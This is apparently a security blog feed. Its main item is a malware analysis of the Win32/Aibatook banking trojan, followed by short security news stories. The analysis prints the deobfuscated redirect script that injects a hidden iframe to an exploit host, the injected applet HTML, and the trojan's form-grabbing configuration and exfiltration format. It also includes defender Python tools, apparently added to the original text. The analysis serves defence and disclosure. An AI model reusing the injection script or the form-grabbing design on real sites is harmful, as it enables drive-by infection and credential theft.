With that in mind, all computer users should ask themselves: Do I need to run Java in my web browser?

Java is probably the most targeted development platform for exploit attacks, and some reports have suggested that a gob-smacking 50% of all exploits target Java.

Over the last few years, it has become increasingly common to find cybercriminal gangs exploiting Java vulnerabilities – as it is so commonly installed, and has a poor history when it comes to security holes.

As a result, and you might have guessed this, Java is not my favourite cup of tea.

Although it’s true that there are some specific applications that need Java, my suspicion is that most computer users could get by just fine without having it enabled in their browser. Even if they do need it for one or two specific sites or applications, it might be better – from the security point of view – to disable Java in the browser and use a *different* browser when you need to access those sites.

If you’re not sure if you need Java enabled, ask your IT support desk or turn it off on your home computer and see if anything stops working. If you don’t notice any difference in your day-to-day browsing of the web, chances are that you never needed it turned on at all.

Congratulations – you’ve just made your computer a whole lot safer.

Not that I’m recommending, of course, that you now visit Japanese porn websites…

Win32/Aibatook: Banking Trojan Spreading Through Japanese Adult Websites
http://www.welivesecurity.com/2014/07/16/win32aibatook/
Wed, 16 Jul 2014 11:41:29 +0000

Win32/Aibatook targets Japanese bank customers with an unusual Internet Explorer monitoring technique. We believe the malware has been in development for months and is now ready for take-off.

Introduction

This blog post will explore a malware family named Win32/Aibatook, which targets Japanese users’ banking information and hosting providers’ account credentials. It appeared at the end of 2013 and a previous version has already been documented by Symantec, which has even sinkholed some of Win32/Aibatook’s C&C servers. Far from being discouraged, the operators have since published an updated version and moved from Delphi to C++ as their programming language. This post will focus on this new strain, which came out in April 2014 and has some interesting quirks:

  • Propagation of the malware is made through a custom exploitation chain placed on compromised websites
  • It only targets Internet Explorer, using an unusual technique to steal personal information
  • Two different implementations of the information-stealing logic are deployed; the first one is specifically tailored against two major Japanese banks, whereas the second one is more flexible and currently used to target around 90 Japanese websites

We will first describe the most recent propagation method of Win32/Aibatook, and then its actual functionalities and their implementation.

Propagation

The Win32/Aibatook bank fraud malware’s story starts, as usual nowadays, with legitimate websites that have been compromised to redirect their visitors to exploit-serving machines in order to infect them with malicious software. But rather than using a full-fledged exploit kit – such as Fiesta, Angler or any other of the usual suspects, which are able to serve different exploits depending on the visitor’s configuration – the miscreants behind Win32/Aibatook infections employ only one exploit at a time. While it could appear to be a non-optimal strategy, it is actually coherent with the targeted nature of this whole operation. If you possess an efficient exploit against your target – Japanese bank customers in this case – why would you bother using more?

Since mid-April, the exploit used to propagate Win32/Aibatook uses the Java vulnerability CVE-2013-2465. In order to do so, several compromised legitimate websites have been used. Over the last three months, we identified four of these websites (and we believe there are more) – these domain names are listed below:

sokuhabo.net
www.uravidata.com
ppv.xxxurabi.com
mywife.cc

These four websites provide pornographic content aimed at a Japanese audience. According to Alexa, three of them belong to the 20,000 most visited websites from Japan; “mywife.cc” is even part of the first 2,000. It remains unclear how the attackers compromised these websites.

The image below describes the exploitation process in the particular case of “ppv.xxxurabi.com” (the other three websites follow similar exploitation logic):

[Figure: Win32/Aibatook exploitation chain, steps 1 to 4 described below]
1. The user browses to a webpage on “ppv.xxxurabi.com”, which includes a link to a malicious JavaScript (JS) file hosted on “google.sonovi.com”, another compromised website.

2. Once a first layer of basic obfuscation has been removed, this script has the following form:

if(document.cookie.indexOf("GOOGLE1")==-1)
{
    // set a 24-hour marker cookie so the redirect fires only once per visitor per day
    var _d=new Date();
    _d.setTime(_d.getTime()+24*60*60*1000);
    document.cookie="GOOGLE1=123GOOGLE1456;expires="+_d.toGMTString();

    // after one second, inject a 1x1 IFRAME pointing at the exploit-serving site;
    // the tag name "iframe" is assembled from two regex literals so it never appears as a string
    setTimeout(
        function(){
            var _ifr=document.createElement(/ifra/.source+/me/.source);
            _ifr.width="1";
            _ifr.height="1";
            _ifr.frameborder="0";
            _ifr.src="//2002.jp/";
            document.body.appendChild(_ifr)},
        1000)
}

The script injects an IFRAME to an exploit-serving webpage “2002.jp”. It also sets a Cookie named “GOOGLE1” that will stay on the user’s computer during the next 24 hours, such that no additional redirects occur during this time-frame.

3. Then the user connects to the exploit-serving website, which replies with what looks like an “Error 404 Not Found” page. Under certain conditions a snippet of HTML code – invisible to the user – is inserted at the very beginning of the page. It is the part preceding the second “<html>” tag in the page source below:

<HTML>
<BODY>
<applet id="HelloApplet" code="b399.class",height="0" width="0"></applet>
</BODY>
</HTML><script src="//ccc.rejec.net/counter.php"></script>
<html>
<head>
<title>Error 404 Not Found</title>

The browser will then download the Java applet “b399.class” from the website and execute it. It will also request a file named “counter.php” on another domain. We believe this last step is related to the conditions under which the HTML snippet will be inserted: only a limited number of users per day will receive the exploit, explaining the need to count the number of tries. This counter script is hosted on what appears to be yet another compromised website, “ccc.rejec.net”.
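As an added example (not code from the post, nor anything the attackers used), here is a defender-side check for the response layout described in steps 3 and 4: a zero-size applet and a third-party script prepended in front of the real document, so that the response contains two “<html>” roots. The two sample pages are constructed for the example; the hostname and class file name in them are the ones given above.

```python
from html.parser import HTMLParser

# Constructed sample reproducing the layout described above: a zero-size
# applet and a counter script on another host, prepended before the real
# "Error 404" document (second <html> root).
INJECTED_PAGE = """<HTML>
<BODY>
<applet id="HelloApplet" code="b399.class" height="0" width="0"></applet>
</BODY>
</HTML><script src="//ccc.rejec.net/counter.php"></script>
<html>
<head>
<title>Error 404 Not Found</title>
</head>
<body>Not found</body>
</html>
"""

# Constructed sample of the same error page without the injected snippet.
CLEAN_PAGE = """<html>
<head><title>Error 404 Not Found</title></head>
<body>Not found</body>
</html>
"""


class _Scanner(HTMLParser):
    """Collect indicators of a prepended exploit snippet while parsing."""

    def __init__(self):
        super().__init__()
        self.html_roots = 0
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}
        if tag == "html":
            self.html_roots += 1
        elif tag in ("applet", "object", "embed"):
            # A plugin element with zero width and height has no visual
            # purpose; the exploit applet in the chain above is exactly that.
            if a.get("width") == "0" and a.get("height") == "0":
                ref = a.get("code") or a.get("src") or a.get("data", "")
                self.findings.append(("hidden_plugin", ref))
        elif tag == "script" and a.get("src"):
            # Scripts pulled from another host are recorded for triage
            # (the counter.php request is one of these).
            src = a["src"]
            if src.startswith(("//", "http://", "https://")):
                self.findings.append(("external_script", src))


def scan_page(html):
    """Return (indicator, detail) pairs; an empty list means nothing flagged."""
    scanner = _Scanner()
    scanner.feed(html)
    scanner.close()
    findings = list(scanner.findings)
    if scanner.html_roots > 1:
        # Two <html> roots in one response: something was prepended to the page.
        findings.append(("multiple_html_roots", str(scanner.html_roots)))
    return findings


if __name__ == "__main__":
    for name, page in (("injected", INJECTED_PAGE), ("clean", CLEAN_PAGE)):
        print(name, scan_page(page))
```

Each indicator on its own is weak (legitimate pages load external scripts), so the value is in the combination: a zero-size plugin element plus a second document root in the same response is the pattern worth alerting on.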

4. The Java applet is an exploit for the vulnerability CVE-2013-2465. Roughly summarized, it starts with an integer overflow in a 2D component of Java SE that leads to a memory corruption in the Abstract Window Toolkit (AWT) code. This memory corruption allows the bypass of the Java sandbox through the rewrite of the “SecurityManager” class. The exploit will then download the payload from the URL provided by one of the class files, save it as “tar.gif”, and finally execute it. The payload URL was “xsvx1014274.xsvr.jp” during our investigation.

The various class files that we observed as part of this exploit are described below:

SHA-1 Hash                                 File Name      Purpose
56ba51304da919b71833520dece8ca3c644011d3   b399.class     Manages the exploitation
49b0699acf7682084b4cde88a3af6d1c1b7c0c09   b399.class     Manages the exploitation
2ca6c1a0cf118ff7beb14453da4875b59d8084e0   a1bd.class     Defines malicious AWT subclass
9f9627dae3adfeac8ecbd8698fc0f5da22f79d70   Af.class       Returns the URL of the file to download
8fb90f496367112049eb8dafb518b98945b0b9ec   HttpGet.class  Fetches a file at a given URL and executes it

We would like to stress the fact that Win32/Aibatook was distributed through other exploits at different periods of time (e.g. CVE-2014-0322), but always in this “one exploit at a time” configuration according to our observations.

Payload

Win32/Aibatook’s main objective is to steal personal and banking information from Japanese users. This comes in two different flavors: firstly, a few banks are targeted in a tailored manner, and secondly, around 90 different websites are targeted through a more generic method. Both these methods rely on the same Internet Explorer manipulation technique, which we are now going to describe.

Internet Explorer Manipulation

Win32/Aibatook controls Internet Explorer through the COM interface “IHTMLDocument2”, which allows easy reading and writing of webpages with high-level methods. To retrieve this interface for the currently browsed webpage, Win32/Aibatook performs the following steps:

  • Retrieve a handle on the window under the mouse cursor using “GetCursorPos” and “WindowFromPoint” API functions
  • Check whether that window’s class name is “Internet Explorer_Server”:
    • If it is not, the program simply sleeps for one second before retrying
    • If it is, the “IHTMLDocument2” interface is instantiated from the window’s handle, using a documented technique

Such Internet Explorer-specific implementations – which work from versions 8 to 11 at least – can seem pretty limited, because no other browsers can be manipulated. However, Japan is one of the few countries where Internet Explorer is the most-used browser. This is another indicator of Win32/Aibatook’s Japanese-only focus.

The next two sections present the attacks used by Win32/Aibatook, respectively denoted “Tailored Information Stealer” and “Generic Information Stealer”.

Tailored Information Stealer

In the first application of the Internet Explorer monitoring technique, Win32/Aibatook targets a few banks whose URLs are hardcoded into the program. During our investigation, we observed Japan Post and the SBI Sumishin Net Bank as targets. In order to attack these banks, Win32/Aibatook extracts the URL of the currently visited webpage, using the “IHTMLDocument2.get_url” method, and compares it with the targeted banks’ URLs.

It should be noted that the banks’ URLs are encrypted with a custom cipher, as are all the malicious strings present in Win32/Aibatook samples. More precisely, each encrypted string is composed of two parts:

  • The first one is a fixed-length key that looks like a base64 encoded string, but that is actually just random base64 characters. Before being used, this key will be XOR-ed with a hardcoded value.
  • The second part contains the encrypted data that will be base64 decoded first, and then XOR-ed with the previous key.
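To make the two-part scheme concrete, here is an added Python model of it, written the way an analyst would to decode strings recovered from a sample; it is not code from the post or from the malware. The post gives neither the key length, nor the hardcoded XOR value, nor how a fixed-length key is applied to longer data, so the 16-byte key, the byte 0x5A and the cyclic reuse of the key are assumptions, and the sample blob is constructed with the inverse routine.

```python
import base64
import os

# ASSUMED parameters: the post does not give the real key length or the
# hardcoded XOR value, so these are placeholders for the example.
KEY_LEN = 16
HARDCODED_XOR = 0x5A

B64_ALPHABET = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def _xor(data: bytes, key: bytes) -> bytes:
    # ASSUMPTION: the key is reused cyclically over data longer than the key.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_string(blob: bytes) -> bytes:
    """Decode one encrypted string: [KEY_LEN base64-looking bytes][base64 data].

    Part one is random base64 characters XOR-ed with the hardcoded value to
    obtain the real key; part two is base64-decoded, then XOR-ed with that key.
    """
    if len(blob) < KEY_LEN:
        raise ValueError("blob shorter than the key part")
    raw_key, enc = blob[:KEY_LEN], blob[KEY_LEN:]
    if any(c not in B64_ALPHABET for c in raw_key):
        raise ValueError("key part is not made of base64 characters")
    key = bytes(b ^ HARDCODED_XOR for b in raw_key)
    return _xor(base64.b64decode(enc, validate=True), key)


def encrypt_string(plaintext: bytes, raw_key: bytes = None) -> bytes:
    """Inverse of decrypt_string, used only to build sample blobs for testing."""
    if raw_key is None:
        # random base64 characters, as the post describes the key part
        raw_key = bytes(B64_ALPHABET[b % 64] for b in os.urandom(KEY_LEN))
    key = bytes(b ^ HARDCODED_XOR for b in raw_key)
    return raw_key + base64.b64encode(_xor(plaintext, key))


if __name__ == "__main__":
    # constructed sample: a made-up URL, not one from the post
    blob = encrypt_string(b"https://bank.example.invalid/login")
    print(blob)
    print(decrypt_string(blob))
```

With the real key length and XOR constant recovered from a sample, `decrypt_string` can be run over every blob found in the binary (and over the fetched configuration file, which the post says uses the same scheme) to list the hardcoded bank URLs and C&C endpoints.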

In case it is one of the targeted banks’ URLs, the malicious program will monitor the user login process based on the title of the page (“IHTMLDocument2.get_title”) and its content (“IHTMLDocument2.get_nameProp”). During this login process, Win32/Aibatook can do two things:

  1. Retrieve values entered by the user in certain HTML input fields (login, password, and so forth.)
  2. Rewrite HTML code displayed to the user by requesting the body of the HTML page (“IHTMLDocument2.get_body”) and modifying it (“body.put_innerHTML”).

In one example of HTML code injected into the Japan Post bank login page, a red message roughly translates as an urgent request for the user to type in their personal identification number, because a system upgrade is necessary (clicking on the button just redirects to another page on the Japan Post website). Once personal information has been gathered, the program sends it to the C&C server using a hardcoded URL. This message is an HTTP POST request containing the grabbed information as parameters, encrypted in a similar manner to the strings previously mentioned. It also sends the MAC address of the machine, probably to identify the victim. Of the two banks targeted with this method, Japan Post – targeted by Win32/Aibatook since the beginning – receives special treatment:

  • A malicious proxy is set in the web browser when the user visits the Japan Post website. We were unable to observe the usage of this proxy, but we can guess it is another way to collect the information entered by the user.
  • If the user visits an anti-phishing webpage on the Japan Post website, Win32/Aibatook redirects to the login page before the anti-phishing webpage can be loaded.

Generic Information Stealer

Last April, an additional information-stealing technique appeared in Win32/Aibatook. It allows attackers to extend the number of targets greatly without too much effort, even targeting non-banking websites. During the last few months this technique has been refined and seems recently to have reached a satisfying level – at least from the Win32/Aibatook authors’ point-of-view – as they are now only modifying the content and not the capabilities of the configuration engine.

This technique, commonly named ‘form-grabbing’, consists of constantly monitoring HTML input fields in webpages browsed by the user. In case these input fields match certain conditions, their filled values will then be exfiltrated. In order to do so, a configuration file describing the target websites is fetched from a hardcoded URL. This file is initially encrypted in a similar manner to the strings described before, and will then be stored in memory in plain-text form. Here is an excerpt of one particular configuration file we found:

[VER]1000[/VER]
[W]

[Web]xy40[/Web]
[CURL]REDACTED.jp[/CURL]
[CTI][/CTI]

[NAME]memberid[/NAME]

[NAME]password[/NAME]

[NAME]domain[/NAME]

[/W]
[W]

[/W]

It’s a structured file with hierarchical tags similar to HTML language, except that tags are enclosed in brackets. It starts with a version tag, followed by a series of “[W]” entries, each of them representing a target and containing multiple sub-entries:

  • “[Web]” tag contains the target’s name, which is usually set to some kind of code name with no apparent meaning
  • “[CURL]” tag contains the target webpage’s URL (the target’s URL has been removed from the excerpt above)
  • “[CTI]” tag contains the target webpage’s title
  • “[NAME]” tag defines an HTML input field’s name that will be leaked
  • “[ID]” tag defines an HTML input field’s ID that will be leaked

The logic followed by the program with this configuration file is the following: if a website’s URL matches the “[CURL]” tag value of one entry, or its title matches the “[CTI]” tag value, then each HTML input field that matches either a “[NAME]” or an “[ID]” tag value will be exfiltrated. To make it clear, let’s take a look at an artificial example:

Win32/Aibatook configuration:

[W]
[Web]CONFIG_DEMO[/Web]
[CURL][/CURL]
[CTI][/CTI]
[NAME]user_name[/NAME]
[ID]user_password[/ID]
[/W]

Page visited by the user at the URL http://my_bank.demo/login/step2.html:

<html>
<title>STEP 2</title>
<form>
User name: <input type="text" name="user_name">
Password: <input type="text" id="user_password">
</form>
</html>

Exfiltrated data when the user has filled the input fields with the values “MY_NAME” and “SECRET_PASSWORD”:

[WEB]CONFIG_DEMO[/WEB]
[TITLE]STEP 2[/TITLE]
[URL]http://my_bank.demo/login/step2.html[/URL]
[NAME=user_name]MY_NAME[/NAME]
[ID=user_password]SECRET_PASSWORD[/ID]

In this example we have a Win32/Aibatook configuration file with one entry, then a visited webpage that will trigger this entry, and finally the information sent to the exfiltration server. This information-stealing technique is highly flexible; in particular some entries come with empty values for the “[CURL]” and “[CTI]” tags, making any webpage with the corresponding HTML input fields a match. In terms of targets, we found 87 of them during our investigation. We were able to identify some of them, based on the “[CURL]” and “[CTI]” tag values, whereas the others remain unidentified. The domains of activity of these targets are described below:
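The matching rule and the configuration format are easier to reason about in code, so here is an added Python example (not the malware’s code and not from the post) that parses the bracket-tag format into entries, decides which entries a given page would trigger and which of its input fields they cover, and turns the non-empty “[CURL]”/“[CTI]” values into a hunting list of targeted sites. The configuration and page are constructed from the artificial example above plus one extra entry with a made-up URL and title; because the post does not say how the comparison is done, substring matching and treating an entry with both “[CURL]” and “[CTI]” empty as a wildcard are assumptions.

```python
import re
from dataclasses import dataclass, field
from html.parser import HTMLParser

# Constructed configuration in the bracket-tag format described above: the
# post's CONFIG_DEMO entry plus a second entry with a made-up URL and title.
SAMPLE_CONFIG = """[VER]1000[/VER]
[W]
[Web]CONFIG_DEMO[/Web]
[CURL][/CURL]
[CTI][/CTI]
[NAME]user_name[/NAME]
[ID]user_password[/ID]
[/W]
[W]
[Web]xy40[/Web]
[CURL]bank.example.invalid[/CURL]
[CTI]Login[/CTI]
[NAME]memberid[/NAME]
[NAME]password[/NAME]
[/W]
"""

# Constructed page: the post's artificial example, given a proper head/body.
SAMPLE_PAGE_URL = "http://my_bank.demo/login/step2.html"
SAMPLE_PAGE_HTML = """<html><head><title>STEP 2</title></head><body>
<form>User name: <input type="text" name="user_name">
Password: <input type="text" id="user_password"></form>
</body></html>"""

ENTRY_RE = re.compile(r"\[W\](.*?)\[/W\]", re.S)
TAG_RE = re.compile(r"\[(\w+)\](.*?)\[/\1\]", re.S)


@dataclass
class Target:
    name: str = ""                               # [Web]
    url: str = ""                                # [CURL]
    title: str = ""                              # [CTI]
    names: list = field(default_factory=list)    # [NAME] values
    ids: list = field(default_factory=list)      # [ID] values


def parse_config(text):
    """Return (version, [Target, ...]) from a decrypted configuration file."""
    m = re.search(r"\[VER\](.*?)\[/VER\]", text, re.S)
    version = m.group(1).strip() if m else ""
    targets = []
    for body in ENTRY_RE.findall(text):
        t = Target()
        for tag, value in TAG_RE.findall(body):
            tag, value = tag.lower(), value.strip()
            if tag == "web":
                t.name = value
            elif tag == "curl":
                t.url = value
            elif tag == "cti":
                t.title = value
            elif tag == "name":
                t.names.append(value)
            elif tag == "id":
                t.ids.append(value)
        targets.append(t)
    return version, targets


class _PageInfo(HTMLParser):
    """Collect the <title> text and every <input>'s name and id attributes."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.inputs = []      # (name, id) per input element
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "input":
            a = dict(attrs)
            self.inputs.append((a.get("name") or "", a.get("id") or ""))

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def entry_fires(t, page_url, page_title):
    """ASSUMPTION: substring match; both [CURL] and [CTI] empty means wildcard."""
    if not t.url and not t.title:
        return True
    return (bool(t.url) and t.url in page_url) or (bool(t.title) and t.title in page_title)


def fields_at_risk(config_text, page_url, page_html):
    """Map each triggered entry name to the page input fields it would capture."""
    _, targets = parse_config(config_text)
    info = _PageInfo()
    info.feed(page_html)
    result = {}
    for t in targets:
        if not entry_fires(t, page_url, info.title):
            continue
        hits = [("NAME", n) for n, _ in info.inputs if n and n in t.names]
        hits += [("ID", i) for _, i in info.inputs if i and i in t.ids]
        if hits:
            result[t.name] = hits
    return result


def watchlist(config_text):
    """Non-empty [CURL] and [CTI] values: a hunting list of the targeted sites."""
    _, targets = parse_config(config_text)
    return sorted({t.url for t in targets if t.url} | {t.title for t in targets if t.title})


if __name__ == "__main__":
    print(fields_at_risk(SAMPLE_CONFIG, SAMPLE_PAGE_URL, SAMPLE_PAGE_HTML))
    print(watchlist(SAMPLE_CONFIG))
```

Run against a real decrypted configuration, `watchlist` is the quick way to answer “is our login page on the list?”, and `fields_at_risk` shows which of a page’s fields an entry would cover, which is what a bank’s security team needs to know when deciding whether to rename form fields or add out-of-band verification.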

Domains of activity Number of targets
Bank 23
Hosting Provider 5
Domain reseller 1
Unidentified 58

As expected, the majority of the identified targets belong to the banking domain, but some of them are hosting companies, which could explain how legitimate websites are compromised and then used in the exploitation chain. It should be noted that the majority of the identified targets are important businesses in Japan.

Conclusion

In this blog post we have described Win32/Aibatook, a malware family targeting Japanese users. Computers become infected by this malware through a custom exploitation chain served by compromised legitimate websites. Its main purpose is to steal personal information through an unusual Internet Explorer monitoring technique. This technique implements two different information stealers, one specifically tailored against a few major Japanese banks, and a second one targeting around 90 different websites.

Based on our observations during this investigation, Win32/Aibatook has been constantly developed over the past few months. We believe that this malware family is now ready for take-off, and we expect its authors to spread it more broadly in the near future.

This analysis was created by Clément Rouault, in collaboration with Joan Calvet.

Hashes

Here are some SHA-1 hashes of Win32/Aibatook samples:

c5ffed550addfa27dc1adbc58f3f99fa9a5bc9e8
ebd4fd477bd8a93bfb24fd49128860e8d2b494e0
3e90dde02423687b7c81cba8fc600f7cbcda8752
4343919ba7c2701f5481632f20bf7ddc2c6ebe11

Artist mails NSA ‘uncrackable’ mixtape http://www.welivesecurity.com/2014/07/16/encryption-tools/ http://www.welivesecurity.com/2014/07/16/encryption-tools/#comments Wed, 16 Jul 2014 11:37:41 +0000 Artist mails NSA ‘uncrackable’ mixtape http://www.welivesecurity.com/?p=48008 An artist has created what he claims to be an ‘uncrackable’ mixtape, using freely available encryption tools and housed on a home-made device, and posted it to America’s National Security Agency (NSA).

The post Artist mails NSA ‘uncrackable’ mixtape appeared first on We Live Security.

An artist has created what he claims to be an ‘uncrackable’ mixtape, using freely available encryption tools and housed on a home-made device, and posted it to America’s National Security Agency (NSA).

Neowin reports that the move is an attempt to voice disquiet over the NSA’s surveillance of electronic communication – and to highlight the importance of encryption tools.

Artist David Huerta describes how the mixtape is secured using freely available encryption tools via a post on Medium – and explains that the tracklisting has only ever been shared on paper, rather than digitally.

The ‘tape’ – actually a bespoke device created using an Arduino microcontroller board – is purposely recorded at low quality to mimic what Huerta imagines to be the low-quality of intercepted phone calls.

Encryption tools create ‘blind spot’

Vice reports that the device is meant to highlight the fact that while government organizations can compromise computer systems and devices, “the actual cryptography connecting those systems was still something it fundamentally can’t break.”

ESET Senior Security Researcher Stephen Cobb says in a blog post explaining the importance of encryption to business, “Encryption of files, whether stored on a drive or emailed via Outlook, not only gets you Safe Harbor when something does go astray, it also buys you considerable peace of mind.”

“The device contains a soundtrack for the modern surveillance state. It’s designed to be enjoyed only by people I have consented it to be listened to,” Huerta says.

Private key

Huerta kept one copy of the ‘tape’ and mailed the other to the NSA’s Maryland headquarters - minus the public key required to decrypt it. Huerta wants his tape to be “a reminder” of the power of encryption.

“Encryption is the blind spot to the NSA’s all-seeing eye. Math doesn’t need an information dominance center to enforce its rules. Math is the legal framework which the universe can only obey and will trump and outlast the rules of any human state,” he writes.

“For the common person to have access to encryption was the result of several Promethean acts of defiance against the military powers that wanted to make cryptography only available to themselves to weaponize.”

CNET ‘database leak’ – are your details safe? http://www.welivesecurity.com/2014/07/16/cnet-database-leak/ http://www.welivesecurity.com/2014/07/16/cnet-database-leak/#comments Wed, 16 Jul 2014 11:21:06 +0000 CNET ‘database leak’ – are your details safe? http://www.welivesecurity.com/?p=47990 Popular technology news and review website CNET faced the threat of having a million users' data exposed this week, with an unknown attacker posting screenshots of data from a CNET server, and demanding a surprisingly small ransom…

The post CNET ‘database leak’ – are your details safe? appeared first on We Live Security.

Popular technology news and review website CNET faced the threat of having a million users’ data exposed this week, with an unknown attacker posting screenshots of data from a CNET server, and demanding a surprisingly small ransom – one Bitcoin.

A Twitter user naming himself “worm” contacted the site, according to CNET’s Seth Rosenblatt, and said that his group, identified by CNET as Russian hackers, had access to a database of registered user data.

Direct messages sent to CNET claimed that the database leak included email addresses, names and encrypted passwords. An image posted to the site, and shown by Forbes, indicated that the persons responsible could access files on the server.

Database leak – ‘users safe for now’

“Worm” avoided giving details of the exploit in his communication with the site – which Beta News suggests should be reassuring to CNET users. Neither the database details nor the means of getting to them have been leaked thus far.

Beta News quotes Worm’s response as “But I principled that something would not sell it if rasprostronenie [distribute] source code — a step to improve safety. SNET [sic] sale bd for me crime, information about the sale move to the aggravation of the situation around hacking”.

Security news reports on the incident have offered several explanations for how Worm could have accessed the data. The Twitter messages suggested that the same group had been behind attacks on high-profile targets such as Bank of America, Adobe and the BBC, according to the BBC’s report.

Group ‘behind high-profile attacks’

The person or group claimed that the demand for one Bitcoin (valued at $622, via xe.com) was merely designed to increase security news publicity for the database leak. The BBC reports that the group said, via direct message, “[W]e are driven to make the Internet a better and safer [place] rather than a desire to protect copyright.”

Forbes reports that Jenn Boscacci, senior manager of corporate communications at CNET, said, “Here’s the situation, a few servers were accessed. We identified the issue and resolved it yesterday. We will continue to monitor.”

Data breaches in New York have tripled http://www.welivesecurity.com/2014/07/15/data-breaches/ http://www.welivesecurity.com/2014/07/15/data-breaches/#comments Tue, 15 Jul 2014 09:40:14 +0000 Data breaches in New York have tripled http://www.welivesecurity.com/?p=47900 Data breaches have hit a record high in the state of New York, tripling since 2006, according to records released by the state attorney general.

The post Data breaches in New York have tripled appeared first on We Live Security.

Data breaches have hit a record high in the state of New York, with 900 breaches affecting 7.3 million people in 2013, according to records released by the state attorney general.

The New York Times notes that the rise in serious data breaches was driven by criminal attacks, with computer hackers “by far” the leading cause of data breaches, responsible for 40% of unauthorized data access in 2013.

Bloomberg’s Businessweek calculates that data breaches have tripled in the period 2006-2014, with “mega breaches” such as the Target data breach partially responsible.

Since 2005, New York law has required companies to notify the attorney general whenever a data breach has exposed private data such as social security numbers, driver’s license details, names and account numbers, according to the Westfield Republican.

Data breaches – hacking now biggest threat

“What’s truly shocking about this report, beyond the fact that hacking is now the greatest threat to our personal information and costs us billions of dollars, is that many of these breaches could have been prevented,” New York’s attorney general, Eric T Schneiderman said in a statement.

Bloomberg News said that since 2006, New Yorkers had experienced 5,000 data breaches, exposing the records of 22.8 million New Yorkers in total.

‘Collaborative approach’ to data breaches

Apart from criminal attacks, the remainder of breaches suffered by New Yorkers were caused by loss or sale of equipment, employee errors, and insider attacks, according to Associated Press.

Schneiderman said, “Our expansive look at data breaches found that millions of New Yorkers have been exposed without their knowledge or consent.”

The attorney general said that his office would take a “collaborative approach to address the complex problems surrounding data security.” Bloomberg reports that Schneiderman said that “engaging industry stakeholders and security experts, as well as lawmakers” could offer new tools for protecting New Yorkers’ private information from data breaches.

Google Chrome security warnings – now in plain English http://www.welivesecurity.com/2014/07/15/google-chrome-security/ http://www.welivesecurity.com/2014/07/15/google-chrome-security/#comments Tue, 15 Jul 2014 09:20:55 +0000 Google Chrome security warnings – now in plain English http://www.welivesecurity.com/?p=47883 “Phishing attack ahead” is similar to the stark, clear warnings delivered by road signs - and web users will soon benefit from this sort of plain-speaking alert, at least when using Google’s Chrome browser.

The post Google Chrome security warnings – now in plain English appeared first on We Live Security.

“Phishing attack ahead” is similar to the stark, clear warnings delivered by road signs – and web users will soon benefit from this sort of plain-speaking alert, thanks to an upcoming change to Google Chrome security warnings.

Google’s Safe Browsing service is testing new malware warnings delivered as part of Google Chrome security – far simpler, and blunter than previous alerts.

According to ZDNet’s report, previously users about to stumble on a phishing website would be warned, “Reported phishing website ahead, Google Chrome has blocked access to [url]. The website has been reported as a phishing website.”

The new warning will be, “Attackers on [url] might try to trick you to steal your information, for instance, passwords, messages or credit cards.”

Google Chrome security overhaul

The new Google Chrome security warnings come on a simple red page – and the previous cartoon of a burglar attempting to reach out and access a computer keyboard has gone – according to Tech World’s report.

Similar changes are being tested with Safe Browsing’s malware warnings, which now warn, bluntly, “The site ahead contains malware.”

The option to avoid the potentially infected page after a Google Chrome security warning is now a clear “back to safety,” according to Tech World.

Commenters on the official Google post have praised the clarity of the new Google Chrome security warnings – and the fact that the language makes clear that the attack has not happened yet.

Warning fatigue

The change comes in the wake of a Berkeley research paper, commissioned by Google, which found that users ignored many browser warnings.

Browser security warnings do work to protect users from phishing and malware sites – but “warning fatigue” means important alerts over site security can be completely ignored.

Users of Google’s Chrome ignored SSL warnings (relating to a secure protocol used for passwords, internet transactions, and banking) 70.2% of the time, a study of 25 million real-life warnings found. Overall, a study using metrics from Firefox and Chrome found that the effectiveness of warnings varies widely from warning to warning and from browser to browser.

“Google Chrome’s SSL warning had a click-through rate of 70.2%. Such a high click-through rate is undesirable: either users are not heeding valid warnings, or the browser is annoying users with invalid warnings and possibly causing warning fatigue,” said the U.C. Berkeley researchers. The study, Alice in Warningland, was part-funded by Google.

“During our field study, users continued through a tenth of Mozilla Firefox’s malware and phishing warnings, a quarter of Google Chrome’s malware and phishing warnings, and a third of Mozilla Firefox’s SSL warnings,” the researchers said.

The researchers analysed the size, type and frequency of warning messages and found that users tended to click rapidly through warnings about “untrusted issuers” and name and date errors – both common warnings, and ignored by nearly half of users.

The researchers say that “warning fatigue” has significant impact – “users click through more-frequent errors more quickly,” they say.

The researchers concluded that previous studies – showing that browser warnings simply did not work – relied on outdated data, harvested in a period between 2002 and 2009 when browsers were rapidly evolving. In particular, the large phishing warnings now delivered by modern browsers were much more effective than previous, more discreet warnings.

How to protect your small business from cybercrime http://www.welivesecurity.com/videos/protect-small-business-cybercrime/ http://www.welivesecurity.com/videos/protect-small-business-cybercrime/#comments Tue, 15 Jul 2014 08:58:23 +0000 How to protect your small business from cybercrime http://www.welivesecurity.com/?post_type=post_video&p=47909 Internet security may not be at the top of your priority list when starting a new business, but ignoring the dangers may be costly. Follow these 5 simple tips from We Live Security to avoid any potential threats.

The post How to protect your small business from cybercrime appeared first on We Live Security.

“I’ve been hacked, and now I’m pregnant!” http://www.welivesecurity.com/2014/07/14/hacked-pregnant/ http://www.welivesecurity.com/2014/07/14/hacked-pregnant/#comments Mon, 14 Jul 2014 15:59:40 +0000 “I’ve been hacked, and now I’m pregnant!” http://www.welivesecurity.com/?p=47847 An embedded microchip that stops you from becoming pregnant? Would you trust it to protect itself properly from a hacker attack?

The post “I’ve been hacked, and now I’m pregnant!” appeared first on We Live Security.

We put trust in technology every day.

We drive a car to work, and trust that its brakes won’t fail too badly, and that its engine won’t explode in a massive fireball on the dual carriageway.

We tap words into a computer, and trust that someone didn’t goof up the wiring and that we’re not going to get an electric shock.

We drink water, and trust that the computers at the water filtration plant didn’t go wacko and allow some toxic element to make its way into the taps in our houses.

It’s clear that we trust technology a lot. And with some very important things.

So, it’s interesting that some things that technology can help with seem to automatically send a shiver down our security spines.

Take MicroCHIPs, for instance. They’re a company from Lexington, Massachusetts, whose tagline is “programmable drug delivery” and who claim to specialise in “intelligent implanted devices designed to improve the health of millions of people”.

